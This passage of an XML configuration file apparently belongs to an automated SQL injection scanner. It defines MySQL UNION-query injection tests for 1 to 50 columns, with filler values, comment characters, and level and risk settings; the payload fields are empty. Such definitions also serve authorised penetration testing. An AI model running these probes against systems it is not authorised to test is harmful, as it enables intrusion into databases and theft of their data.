    <test>        <title>MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>1-10</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 11 to 20 columns</title>        <stype>6</stype>        <level>2</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>11-20</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 21 to 30 columns</title>        <stype>6</stype>        <level>3</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>21-30</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 31 to 40 columns</title>        <stype>6</stype>        <level>4</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>31-40</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([CHAR]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[CHAR]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query (NULL) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>NULL</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>
    <test>        <title>MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>        <stype>6</stype>        <level>5</level>        <risk>1</risk>        <clause>1,2,3,4,5</clause>        <where>1</where>        <vector>[UNION]</vector>        <request>            <payload/>            <comment>#</comment>            <char>[RANDNUM]</char>            <columns>41-50</columns>        </request>        <response>            <union/>        </response>        <details>            <dbms>MySQL</dbms>        </details>    </test>    <!-- End of UNION query tests --></root>